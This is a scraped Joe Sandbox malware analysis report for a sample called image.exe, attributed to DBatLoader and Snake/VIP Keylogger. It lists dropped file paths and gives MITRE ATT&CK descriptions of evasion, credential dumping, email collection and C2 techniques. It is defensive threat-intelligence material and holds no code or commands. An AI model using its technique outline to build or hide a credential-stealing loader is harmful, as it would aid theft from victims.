Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report image.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

C:\Users\Public\Libraries\NEO.cmd

C:\Users\Public\Libraries\Pumyophn

C:\Users\Public\Libraries\Pumyophn.PIF

C:\Users\Public\Libraries\nhpoymuP.pif

C:\Users\Public\Pumyophn.url

C:\Users\Public\PumyophnF.cmd

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nhpoymuP.pif.log

Static File Info

General

Windows Analysis Report
image.exe

Function 02CA8BA8 Relevance: 47.2, APIs: 3, Strings: 23, Instructions: 1654
threadnativeinjectionCOMMON

Function 02CA8BA6 Relevance: 47.1, APIs: 3, Strings: 23, Instructions: 1605
threadCOMMON

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre